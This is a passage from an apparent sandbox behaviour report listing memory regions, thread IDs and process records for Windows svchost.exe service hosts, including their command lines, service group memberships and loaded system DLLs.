"c:\\windows\\system32\\oleaut32.dll") Region: id = 4896 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4897 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4898 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4899 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4900 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4901 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4902 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4903 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 362 os_tid = 0xd50 Thread: id = 363 os_tid = 0x4d4 Thread: id = 364 os_tid = 0x494 Thread: id = 365 os_tid = 0x4b0 Thread: id = 366 os_tid = 0x484 Thread: id = 367 os_tid = 0x480 Thread: id = 368 os_tid = 0x47c Thread: id = 369 os_tid = 0x478 Thread: id = 370 os_tid = 0x474 Thread: id = 371 os_tid = 0x468 Thread: id = 372 os_tid = 0x450 Thread: id = 373 os_tid = 0x44c Thread: id = 374 os_tid = 0x43c Thread: id = 375 os_tid = 0x3b0 Thread: id = 376 os_tid = 0x340 Thread: id = 377 os_tid = 0x2e8 Thread: id = 378 os_tid = 0x318 Thread: id = 379 os_tid = 0x284 Thread: id = 380 os_tid = 0x280 Thread: id = 381 os_tid = 0x3e8 Thread: id = 382 os_tid = 0x3e0 Thread: id = 383 os_tid = 0x394 Process: id = "30" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x569f3000" os_pid = "0x3a0" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BthHFSrv" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xa], "NT SERVICE\\TimeBroker" [0xe], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cdda" [0xc000000f], "LOCAL" [0x7] Thread: id = 384 os_tid = 0x1d0 Thread: id = 385 os_tid = 0xcd4 Thread: id = 386 os_tid = 0xcd0 Thread: id = 387 os_tid = 0xcbc Thread: id = 388 os_tid = 0xcb8 Thread: id = 389 os_tid = 0xcb4 Thread: id = 390 os_tid = 0x3fc Thread: id = 391 os_tid = 0x3f8 Thread: id = 392 os_tid = 0x3a4 Process: id = "31" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x5440d000" os_pid = "0x3d4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xe], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d0eb" [0xc000000f], "LOCAL" [0x7] Region: id = 3720 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3721 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3722 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3723 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3724 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3725 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3726 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3727 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 3728 start_va = 0x190000 end_va = 0x196fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3729 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3730 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3731 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 3732 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 3733 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3734 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3735 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3736 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3737 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3738 start_va = 0x5c0000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 3739 start_va = 0x680000 end_va = 0x686fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 3740 start_va = 0x690000 end_va = 0x6a1fff monitored = 0 entry_point = 0x6b7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3741 start_va = 0x6b0000 end_va = 0x6b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 3742 start_va = 0x6c0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 3743 start_va = 0x6d0000 end_va = 0x6d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 3744 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 3745 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 3746 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 3747 start_va = 0xb20000 end_va = 0xf1afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 3748 start_va = 0xf70000 end_va = 0xf76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 3749 start_va = 0xf90000 end_va = 0xf96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 3750 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 3751 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 3752 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 3753 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 3754 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 3755 start_va = 0x1500000 end_va = 0x1548fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 3756 start_va = 0x1570000 end_va = 0x1571fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netprofmsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui") Region: id = 3757 start_va = 0x1580000 end_va = 0x15adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001580000" filename = "" Region: id = 3758 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 3759 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 3760 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 3761 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 3762 start_va = 0x1a00000 end_va = 0x29fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 3763 start_va = 0x2ae0000 end_va = 0x2e16fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3764 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 3765 start_va = 0x3000000 end_va = 0x30dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3766 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 3767 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 3768 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 3769 start_va = 0x3d00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 3770 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 3771 start_va = 0x3f00000 end_va = 0x46fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 3772 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 3773 start_va = 0x64d0000 end_va = 0x65cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064d0000" filename = "" Region: id = 3774 start_va = 0x65d0000 end_va = 0x66cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065d0000" filename = "" Region: id = 3775 start_va = 0x66d0000 end_va = 0x67cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066d0000" filename = "" Region: id = 3776 start_va = 0x67d0000 end_va = 0x68cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067d0000" filename = "" Region: id = 3777 start_va = 0x68d0000 end_va = 0x69cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068d0000" filename = "" Region: id = 3778 start_va = 0x69d0000 end_va = 0x6acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000069d0000" filename = "" Region: id = 3779 start_va = 0x6ad0000 end_va = 0x6bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ad0000" filename = "" Region: id = 3780 start_va = 0x6dd0000 end_va = 0x6ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006dd0000" filename = "" Region: id = 3781 start_va = 0x6ed0000 end_va = 0x6fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ed0000" filename = "" Region: id = 3782 start_va = 0x6fd0000 end_va = 0x70cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006fd0000" filename = "" Region: id = 3783 start_va = 0x70d0000 end_va = 0x71cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000070d0000" filename = "" Region: id = 3784 start_va = 0x72d0000 end_va = 0x73cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072d0000" filename = "" Region: id = 3785 start_va = 0x74d0000 end_va = 0x75cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000074d0000" filename = "" Region: id = 3786 start_va = 0x75d0000 end_va = 0x76cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075d0000" filename = "" Region: id = 3787 start_va = 0x76d0000 end_va = 0x77cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076d0000" filename = "" Region: id = 3788 start_va = 0x77d0000 end_va = 0x78cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077d0000" filename = "" Region: id = 3789 start_va = 0x79d0000 end_va = 0x7acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079d0000" filename = "" Region: id = 3790 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3791 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3792 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3793 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3794 start_va = 0x7ff6c7f10000 end_va = 0x7ff6c7f1cfff monitored = 0 entry_point = 0x7ff6c7f13980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3795 start_va = 0x7ff8438d0000 end_va = 0x7ff843980fff monitored = 0 entry_point = 0x7ff843941ca0 region_type = mapped_file name = "windows.security.authentication.web.core.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.Web.Core.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.web.core.dll") Region: id = 3796 start_va = 0x7ff847120000 end_va = 0x7ff8471e4fff monitored = 0 entry_point = 0x7ff84712e740 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 3797 start_va = 0x7ff849c10000 end_va = 0x7ff849c26fff monitored = 0 entry_point = 0x7ff849c16620 region_type = mapped_file name = "msauserext.dll" filename = "\\Windows\\System32\\msauserext.dll" (normalized: "c:\\windows\\system32\\msauserext.dll") Region: id = 3798 start_va = 0x7ff84adc0000 end_va = 0x7ff84b039fff monitored = 0 entry_point = 0x7ff84adda7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 3799 start_va = 0x7ff84be50000 end_va = 0x7ff84be71fff monitored = 0 entry_point = 0x7ff84be62540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 3800 start_va = 0x7ff84be80000 end_va = 0x7ff84bf54fff monitored = 0 entry_point = 0x7ff84be9cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 3801 start_va = 0x7ff84bf60000 end_va = 0x7ff84c011fff monitored = 0 entry_point = 0x7ff84bf7f750 region_type = mapped_file name = "windows.security.authentication.onlineid.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.OnlineId.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.onlineid.dll") Region: id = 3802 start_va = 0x7ff84c020000 end_va = 0x7ff84c035fff monitored = 0 entry_point = 0x7ff84c02b550 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 3803 start_va = 0x7ff84c040000 end_va = 0x7ff84c17cfff monitored = 0 entry_point = 0x7ff84c05a6a0 region_type = mapped_file name = "licensemanager.dll" filename = "\\Windows\\System32\\LicenseManager.dll" (normalized: "c:\\windows\\system32\\licensemanager.dll") Region: id = 3804 start_va = 0x7ff84df30000 end_va = 0x7ff84df47fff monitored = 0 entry_point = 0x7ff84df34a20 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 3805 start_va = 0x7ff84e190000 end_va = 0x7ff84e19ffff monitored = 0 entry_point = 0x7ff84e191690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 3806 start_va = 0x7ff84e1a0000 end_va = 0x7ff84e1aafff monitored = 0 entry_point = 0x7ff84e1a1a20 region_type = mapped_file name = "licensemanagersvc.dll" filename = "\\Windows\\System32\\LicenseManagerSvc.dll" (normalized: "c:\\windows\\system32\\licensemanagersvc.dll") Region: id = 3807 start_va = 0x7ff84ee50000 end_va = 0x7ff84eee3fff monitored = 0 entry_point = 0x7ff84ee89210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 3808 start_va = 0x7ff84eef0000 end_va = 0x7ff84f192fff monitored = 0 entry_point = 0x7ff84ef16190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 3809 start_va = 0x7ff84f1a0000 end_va = 0x7ff84f1b1fff monitored = 0 entry_point = 0x7ff84f1a1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 3810 start_va = 0x7ff84ff20000 end_va = 0x7ff84ff3cfff monitored = 0 entry_point = 0x7ff84ff26190 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 3811 start_va = 0x7ff851d40000 end_va = 0x7ff851d49fff monitored = 0 entry_point = 0x7ff851d414c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3812 start_va = 0x7ff8522e0000 end_va = 0x7ff8522fdfff monitored = 0 entry_point = 0x7ff8522e1690 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 3813 start_va = 0x7ff852300000 end_va = 0x7ff852318fff monitored = 0 entry_point = 0x7ff852302180 region_type = mapped_file name = "bthradiomedia.dll" filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll") Region: id = 3814 start_va = 0x7ff852320000 end_va = 0x7ff852333fff monitored = 0 entry_point = 0x7ff852321a50 region_type = mapped_file name = "wlanradiomanager.dll" filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll") Region: id = 3815 start_va = 0x7ff8524b0000 end_va = 0x7ff8524bdfff monitored = 0 entry_point = 0x7ff8524b1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3816 start_va = 0x7ff852580000 end_va = 0x7ff85260afff monitored = 0 entry_point = 0x7ff85259d2a0 region_type = mapped_file name = "netprofmsvc.dll" filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll") Region: id = 3817 start_va = 0x7ff852880000 end_va = 0x7ff85288afff monitored = 0 entry_point = 0x7ff852881d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3818 start_va = 0x7ff852890000 end_va = 0x7ff8528a9fff monitored = 0 entry_point = 0x7ff852892430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3819 start_va = 0x7ff8528b0000 end_va = 0x7ff8528c5fff monitored = 0 entry_point = 0x7ff8528b19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3820 start_va = 0x7ff852960000 end_va = 0x7ff852997fff monitored = 0 entry_point = 0x7ff852978cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3821 start_va = 0x7ff852aa0000 end_va = 0x7ff852aacfff monitored = 0 entry_point = 0x7ff852aa2650 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 3822 start_va = 0x7ff852ed0000 end_va = 0x7ff852ef8fff monitored = 0 entry_point = 0x7ff852ee24d0 region_type = mapped_file name = "fontprovider.dll" filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll") Region: id = 3823 start_va = 0x7ff852fc0000 end_va = 0x7ff853161fff monitored = 0 entry_point = 0x7ff85300c2d0 region_type = mapped_file name = "fntcache.dll" filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll") Region: id = 3824 start_va = 0x7ff853760000 end_va = 0x7ff8537d9fff monitored = 0 entry_point = 0x7ff853787630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3825 start_va = 0x7ff8537e0000 end_va = 0x7ff8537f5fff monitored = 0 entry_point = 0x7ff8537e1b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3826 start_va = 0x7ff8539c0000 end_va = 0x7ff853d41fff monitored = 0 entry_point = 0x7ff853a11220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3827 start_va = 0x7ff855250000 end_va = 0x7ff855385fff monitored = 0 entry_point = 0x7ff85527f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 3828 start_va = 0x7ff8556b0000 end_va = 0x7ff8556bbfff monitored = 0 entry_point = 0x7ff8556b14d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 3829 start_va = 0x7ff8556c0000 end_va = 0x7ff855787fff monitored = 0 entry_point = 0x7ff8557013f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3830 start_va = 0x7ff855790000 end_va = 0x7ff8557f0fff monitored = 0 entry_point = 0x7ff855794b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 3831 start_va = 0x7ff855af0000 end_va = 0x7ff855b39fff monitored = 0 entry_point = 0x7ff855afac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 3832 start_va = 0x7ff855b40000 end_va = 0x7ff855b72fff monitored = 0 entry_point = 0x7ff855b4d5a0 region_type = mapped_file name = "biwinrt.dll" filename = "\\Windows\\System32\\biwinrt.dll" (normalized: "c:\\windows\\system32\\biwinrt.dll") Region: id = 3833 start_va = 0x7ff855b80000 end_va = 0x7ff855c11fff monitored = 0 entry_point = 0x7ff855bca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 3834 start_va = 